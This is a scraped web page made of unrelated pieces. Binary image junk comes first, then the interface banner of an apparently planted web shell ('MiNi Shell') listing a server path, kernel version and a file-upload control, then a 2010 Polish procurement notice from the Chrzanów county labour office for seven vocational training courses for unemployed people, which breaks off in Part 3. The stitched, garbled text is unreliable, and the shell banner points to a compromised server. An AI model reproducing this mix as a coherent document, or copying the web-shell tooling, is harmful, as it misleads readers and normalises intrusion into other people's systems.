JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100701/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100701/190594-N-2010.html

<p class="kh_header"><b>Chrzanów: Przeprowadzenie szkoleń grupowych dla osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Chrzanowie.</b><br>
<b>Numer ogłoszenia: 190594 - 2010; data zamieszczenia: 01.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Chrzanowie , ul. Słowackiego 8, 32-500 Chrzanów, woj. małopolskie, tel. 032 7533800, faks 032 7533899.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup-chrzanow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie szkoleń grupowych dla osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Chrzanowie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część 1.  Profesjonalna obsługa komputera i Internetu :  - dla   60  osób ( podzielonych na  4 grupy 15 osobowe) ,  planowany termin realizacji - I gr. - lipiec / sierpień, II gr. - sierpień/wrzesień, III gr. - wrzesień / październik, IV gr. - listopad  2010. Szkolenie współfinansowane z Europejskiego Funduszu Społecznego.

Część 2. Pracownik administracyjno - biurowy z jęz. ang.   - dla 20  osób (w przypadku części praktycznej podzielonych na 2 grupy 10 osobowe),  planowany termin realizacji  lipiec / sierpień  2010. Szkolenie współfinansowane z Europejskiego Funduszu Społecznego.

Część 3.  Pracownik ochrony osób i mienia I stopnia   - dla  20  osób, planowany termin realizacji : lipiec / sierpień/wrzesień  2010 .  Szkolenie współfinansowane  z Europejskiego Funduszu Społecznego. 

Część 4.  Spawacz elektryczno - gazowy   - dla  12 osób,  planowany termin realizacji: 
 sierpień/wrzesień 2010.  Szkolenie współfinansowane z Europejskiego Funduszu Społecznego.

Część 5. Magazynier  - dla  15  osób, planowany termin realizacji -  lipiec/sierpień -  Szkolenie  współfinansowane z Europejskiego Funduszu Społecznego. 

Część 6. Uprawnienia elektryczne do 1 kV - dla 20 osób, planowany termin realizacji: wrzesień  2010. Szkolenie współfinansowane z Europejskiego Funduszu Społecznego.

Część 7. Fliziarz - Posadzkarz  - dla 10 osób, planowany termin realizacji: sierpień / wrzesień 2010. Szkolenie współfinansowane z Europejskiego Funduszu Społecznego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.30.00-9, 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Aktualny wpis do rejestru instytucji szkoleniowych wydany przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej  zgodnie z Rozporządzeniem Ministra Gospodarki i Pracy z dnia 27 października 2004r. w sprawie rejestru instytucji szkoleniowych Dz. U. Nr 236 poz. 2365) - dotyczy wszystkich części zamówienia. 
2.Aktualny Atest Instytutu Spawalnictwa w Gliwicach uprawniający do szkolenia i egzaminowania spawaczy  - okres ważności atestu nie może być krótszy niż termin realizacji szkolenia  -  dotyczy części  4 zamówienia. 
3.Uprawnienia do prowadzenia szkoleń w zakresie kierowców wózków jezdniowych wydane przez Ośrodek Doskonalenia Kadr w Mysłowicach nadzorowany przez  Ministra właściwego do spraw gospodarki zgodnie z  Rozporządzeniem  Ministra Gospodarki z dnia 10 maja 2002r. w sprawie bezpieczeństwa i higieny pracy przy użytkowaniu wózków jezdniowych z napędem silnikowym ( Dz. U nr 70, poz. 650 z późn. zm.)  - dotyczy części 5 zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.warunek ten zostanie spełniony, jeżeli Wykonawca wykaże się przeprowadzeniem z należytą starannością, co najmniej jednego szkolenia grupowego w  okresie ostatnich trzech lat ( dla min. 10 osób )  przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie - o tematyce tożsamej z przedmiotem zamówienia  dla poszczególnych części zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże,  iż  na czas realizacji zamówienia będzie dysponował  urządzeniami  adekwatnymi do danej  części zamówienia umożliwiającymi realizację szkolenia ( załącznik nr  10 do  SIWZ).  Na jednego  uczestnika  musi przypadać  jedno stanowisko  szkoleniowe wyposażone w  niezbędne narzędzia  i materiały . Każdy z uczestników szkolenia powinien  mieć indywidualny  dostęp do sprzętu  i materiałów wykorzystywanych przy realizacji szkolenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże,  iż  na czas realizacji zamówienia będzie dysponował co  najmniej 2 osobami do każdej z części zamówienia, które posiadają adekwatne do zakresu szkolenia  kwalifikacje, wykształcenie,  doświadczenie zawodowe</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Oświadczenie  Wykonawcy o spełnieniu warunków udziału w postępowaniu określonych  w  art. 22 ust. 1 ustawy Pzp.
2. Pisemne oświadczenie o nie zaleganiu z opłacaniem podatków, opłat oraz składek na  ubezpieczenie zdrowotne i społeczne. 
3. oświadczenie  o braku podstaw do wykluczenia z postępowania z powodu niespełnienia warunków, o których mowa  w  art. 24 ust. 1 ustawy Pzp.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.75</li>
<li>2 - Doświadczenie wykonawcy - 0.20</li>
<li>3 - Posiadanie certyfikatów jakości usług - 0.05</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ust. 1 ustawy Prawo zamówień publicznych Zamawiający dopuszcza   możliwość  zmiany  postanowień  umowy, której wzór stanowi załącznik nr 8 do niniejszej   SIWZ. Zmiany mogą dotyczyć:
-  zakresu  usług objętych umową,  w przypadku  zmian przepisów prawa w tym zakresie,
- miejsca realizacji  świadczeń z  zastrzeżeniem lokalizacji na terenie powiatu chrzanowskiego,
-  kadry wykonującej przedmiot zamówienia z przyczyn losowych ( za zgodą Zamawiającego ),
-  terminu przeprowadzenia szkolenia  - w obrębie 1- go miesiąca  dla danej grupy,
- zmiana ilości  osób  objętych  szkoleniem,
- zmiana  kosztów szkolenia jeżeli te zmiany są korzystne dla  Zamawiającego,
- zmiana kosztu osobogodziny jeżeli  ta  zmiana jest  korzystna dla  Zamawiającego
- zmiany w harmonogramie zajęć pod warunkiem zachowania terminu realizacji umowy oraz tego  że  plan nauczania będzie obejmował przeciętnie nie mniej niż 30 godzin zegarowych w tygodniu. Termin realizacji zamówienia może ulec zmianie tylko w szczególnie uzasadnionych przypadkach.
Warunkiem dokonania zmiany jest  zawiadomienie o zaistnieniu w/w okoliczności w formie pisemnej .

Ewentualne wprowadzenie wskazanych powyżej zmian do umowy nie może skutkować zwiększeniem wynagrodzenia wynikającego  z tytułu realizacji umowy.

Zgodę na  dokonanie zmian musi wyrazić każda ze stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup-chrzanow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy, ul Słowackiego 8, 32-500 Chrzanów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.07.2010 godzina 09:30, miejsce: Powiatowy Urząd Pracy ul. Słowackiego 8, 32-500 Chrzanów, Dziennik podawczy ( parter)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Nowe Perspektywy realizowany w ramach PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI PRIORYTET VI Rynek pracy otwarty dla wszystkich DZIAŁANIE 6.1 Poprawa   dostępu do zatrudnienia oraz wspieranie aktywności zawodowej w regionie PODDZIAŁANIE 6.1.3 Poprawa zdolności do zatrudnienia oraz podnoszenie poziomu aktywności zawodowej osób bezrobotnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Profesjonalna obsługa komputera i Internetu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia: przeprowadzenie szkolenia dla  60  osób bezrobotnych  podzielonych na cztery  grupy  15 osobowe w specjalności: Profesjonalna obsługa komputera i Internetu. 

2.  Miejsce organizacji szkolenia:  powiat chrzanowski.

W przypadku przeprowadzenia zajęć poza miastem Chrzanów  instytucja szkoleniowa zobowiązuje się zapewnić dowóz uczestnikom szkolenia z Chrzanowa na miejsce odbywania zajęć i z powrotem. Koszt dowozu zostanie  wliczony do ceny szkolenia od jednej osoby i wykazany w odrębnej pozycji w preliminarzu kosztów szkolenia. 

3. Program szkolenia powinien obejmować:  120  godzin dydaktycznych i obejmować następujące moduły:
a. Podstawowe elementy komputera i ich funkcje - modułowa budowa komputera,
b. Podstawy obsługi elementów pakietu Microsoft Office - Word, Excel, PowerPoint,
c. Podstawy obsługi systemu operacyjnego Microsoft Windows XP Home Edition,
d. Instalowanie i uruchamianie programów na komputerze,
e. Przywracanie systemu w razie awarii,
f. Zachowywanie, kasowanie, kopiowanie i archiwizacja plików,
g. Nagrywanie płyt CD,
h. Obsługa pomocnych programów takich jak: komunikatora, odtwarzacza muzyki i filmów, przeglądarki,
i. Zabezpieczanie komputera przed wirusami i hackerami,
j. Konfiguracja połączenia internetowego stałego i modemowego,
k. Podstawy wykorzystania internetu,
l. Założenie własnej skrzynki emailowej oraz jej obsługa,
m. Efektywne wyszukiwanie w sieci poszukiwanych informacji,
n. Efektywne korzystanie z grup dyskusyjnych i forum internetowego.

Program powinien zawierać wskazane powyżej minimum programowe , które może zostać poszerzone o zagadnienia, które w ocenie Wykonawcy winny być zrealizowane celem odpowiedniego przygotowania uczestników szkolenia jednak ogólna liczba godzin nie  może przekroczyć 120. 

W programie szkolenia muszą być wykorzystane standardy kwalifikacji zawodowych i modułowych programów szkoleń zawodowych  dostępnych pod adresem www.standardyiszkolenia.praca.gov.pl.

4.Czas trwania:  nie dłużej niż 20 kolejnych dni roboczych. 

5. Termin realizacji szkolenia: 

I grupa -  lipiec/sierpień 2010
II grupa -  sierpień / wrzesień 2010
III grupa - wrzesień / październik 2010
IV grupa  - listopad  2010

Dokładne terminy realizacji zostaną określone w umowie szkoleniowej. 

6. Sposób organizacji szkolenia:  

Wykonawca zapewnia liczbę komputerów co najmniej równą liczbie uczestników ( na jedno stanowisko komputerowe przypada tylko jeden uczestnik ).

7. Inne postanowienia:
Szkolenie zakończy się egzaminem  wewnętrznym sprawdzającym nabyte przez słuchaczy umiejętności oraz wydaniem dokumentów świadczących  o ukończeniu szkolenia ( zaświadczeń, świadectw, certyfikatów itp. ) W/w dokumenty mają być wydane zgodnie   z Rozporządzeniem Ministra Edukacji i Nauki   z dnia 3 lutego 2006r w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz.U Nr.31 poz.216)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.30.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 20.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.75</li>
<li>2. Doświadczenie wykonawcy - 0.20</li>
<li>3. Certyfikaty jakości usług - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pracownik administracyjno - biurowy  z jęz. ang..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia: przeprowadzenie szkolenia dla  20  osób bezrobotnych w specjalności:  Pracownik administracyjno - biurowy z jęz. ang.   

2.  Miejsce organizacji szkolenia:  powiat chrzanowski.

W przypadku przeprowadzenia zajęć poza miastem Chrzanów  instytucja szkoleniowa zobowiązuje się zapewnić dowóz uczestnikom szkolenia z Chrzanowa na miejsce odbywania zajęć i z powrotem. Koszt dowozu zostanie  wliczony do ceny szkolenia od jednej osoby i wykazany w odrębnej pozycji w preliminarzu kosztów szkolenia.

3.Program szkolenia powinien obejmować 150  godzin dydaktycznych i zawierać następujące moduły:
1.Organizacja i specyfika pracy biurowej
-	Samodzielna organizacja czasu pracy 
-	Etykieta biurowa 
-	Etyka zawodowa w tym ochrona danych osobowych 
-	Redagowanie pism i listów oraz pisanie raportów 
-	Obieg dokumentów wewnątrz i na zewnątrz organizacji, segregacja poczty 
-	Przyjmowanie i obsługiwanie interesantów w tym prowadzenie rozmów telefonicznych 
-	Przechowywanie oraz archiwizacja dokumentów, informacji oraz akt 
-	Kompleksowe przygotowanie spotkań z kontrahentami/klientami jak również pracownikami; prowadzenie bazy danych kontrahentów/klientów 
-	Kierowanie zespołem pracowników oraz przeprowadzanie ich oceny 
-	Kadry, płace, finanse, podatki oraz listy płac i ubezpieczenia społeczne 
-	Obsługa urządzeń biurowych 
2.	Obsługa biurowych programów komputerowych głównie  pakiet MS OFFICE - 60 h
3.Lektorat języka Angielskiego - 40  h

Stosunek liczby godzin praktycznych do ogólnej liczby godzin nie może być mniejszy niż 50%. 

W programie szkolenia muszą być wykorzystane standardy kwalifikacji zawodowych i modułowych programów szkoleń zawodowych  dostępnych pod adresem www.standardyiszkolenia.praca.gov.pl.

Program powinien zawierać wskazane powyżej minimum programowe , które może zostać poszerzone o zagadnienia, które w ocenie Wykonawcy winny być zrealizowane celem odpowiedniego przygotowania uczestników szkolenia, jednak liczba godzin nie może przekroczyć 150. 

4.Czas trwania: nie dłużej niż 25 kolejnych dni roboczych 

5.Termin realizacji szkolenia: 
Lipiec / sierpień 2010r. 
Dokładny  termin  realizacji zostanie  określony w umowie szkoleniowej. 


6.Sposób realizacji szkolenia: 

W przypadku zajęć praktycznych na komputerach liczba uczestników nie może przekroczyć 10 osób.  Wykonawca zapewnia liczbę komputerów co najmniej równa liczbie uczestników ( na jedno stanowisko komputerowe przypada tylko jeden uczestnik )

7.Inne postanowienia:

Szkolenie zakończy się egzaminem  wewnętrznym sprawdzającym nabyte przez słuchaczy umiejętności oraz wydaniem dokumentów świadczących  o ukończeniu szkolenia ( zaświadczeń, świadectw, certyfikatów itp. ) W/w dokumenty mają być wydane zgodnie   z Rozporządzeniem Ministra Edukacji i Nauki   z dnia 3 lutego 2006r w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz.U Nr.31 poz.216)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 25.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.75</li>
<li>2. Doświadczenie wykonawcy - 0.20</li>
<li>3. Certyfikaty jakości uslug - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pracownik ochrony osób i mienia I stopnia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia: przeprowadzenie szkolenia dla 20 osób bezrobotnych w specjalności: Pracownik ochrony osób i mienia I stopnia .

2.  Miejsce organizacji szkolenia:  powiat chrzanowski.

W przypadku przeprowadzenia zajęć poza miastem Chrzanów  instytucja szkoleniowa zobowiązuje się zapewnić dowóz uczestnikom szkolenia z Chrzanowa na miejsce odbywania zajęć i z powrotem. Koszt dowozu zostanie  wliczony do ceny szkolenia od jednej osoby i wykazany w odrębnej pozycji w preliminarzu kosztów szkolenia.
 
Wyjątek stanowi część  praktyczna w zakresie strzelectwa, która może być przeprowadzona  poza powiatem chrzanowskim. W przypadku przeprowadzenia szkolenia poza miastem Chrzanów  Wykonawca zobowiązuje  się zapewnić transport uczestnikom szkolenia z Chrzanowa do miejsca odbywania zajęć  i z powrotem. Koszt dowozu musi zostać wliczony w cenę szkolenia od osoby i wykazany w odrębnej pozycji w preliminarzu kosztów szkolenia ( zał. nr 7 do SIWZ). 

